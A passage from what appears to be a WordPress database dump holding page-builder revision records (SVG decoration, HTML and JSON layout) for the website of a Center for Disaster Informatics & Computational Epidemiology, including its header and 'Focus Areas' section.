d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n            <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-215 style-local-22-h27\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Center for Disaster Informatics &amp; Computational Epidemiology</h3>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Enabling Data-Driven Disaster Assessment &amp; Planning\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h29\" class=\"h-x-container style-677 style-local-22-h29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h29-group style-677-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-678-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"\"  data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-678 style-local-22-h30 position-relative\"><!----><!----> <span>our mission</span></a>\n                    </span>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h31\" class=\"h-x-container style-217 style-local-22-h31 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h31-group style-217-spacing style-local-22-h31-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h32-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\"  data-colibri-id=\"22-h32\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h32 position-relative\"><!----><!----> <span>Learn More</span></a>\n                    </span>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h33-outer\">\n            <div data-colibri-id=\"22-h33\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h33 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h34\" class=\"d-block style-221 style-local-22-h34 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h34-image\">\n                      <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h34-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-04-29 09:16:29','2022-04-29 13:16:29','',22,'https://gsudice.dataconn.net/?p=1290',0,'revision','',0),(1294,1,'2022-04-29 09:17:36','2022-04-29 13:17:36','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":336,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c5\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":337,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":335,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c7\",\"parentId\":\"20-c6\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c7\",\"index\":0,\"id\":\"20-c8\",\"partialId\":20,\"styleRef\":334,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas<br>\"}}],\"styleRef\":333,\"type\":\"content\"}],\"id\":\"20-c6\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":331,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c10\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c10\",\"index\":0,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c12\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease &amp; disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c14\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c14\",\"index\":0,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c16\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c17\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c18\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c18\",\"index\":0,\"id\":\"20-c19\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c20\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c21\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c9\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-04-29 09:17:36','2022-04-29 13:17:36','',168,'https://gsudice.dataconn.net/?p=1294',0,'revision','',0),(1295,1,'2022-04-29 09:17:36','2022-04-29 13:17:36','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-335 style-local-20-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-336-outer style-local-20-c4-outer\">\n            <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-336 style-local-20-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-337-outer style-local-20-c5-outer\">\n            <div data-colibri-id=\"20-c5\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-337 style-local-20-c5 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"20-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-331 style-local-20-c6 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-333-outer style-local-20-c7-outer\">\n            <div data-colibri-id=\"20-c7\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-333 style-local-20-c7 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c8\" class=\"h-global-transition-all h-heading style-334 style-local-20-c8 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-334 style-local-20-c8\">\n                    <!---->\n                    <!---->\n                    <h1 class=\"\">Focus Areas</h1>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"20-c9\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c10-outer\">\n            <div data-colibri-id=\"20-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c11\" class=\"h-icon style-274 style-local-20-c11 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c11-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 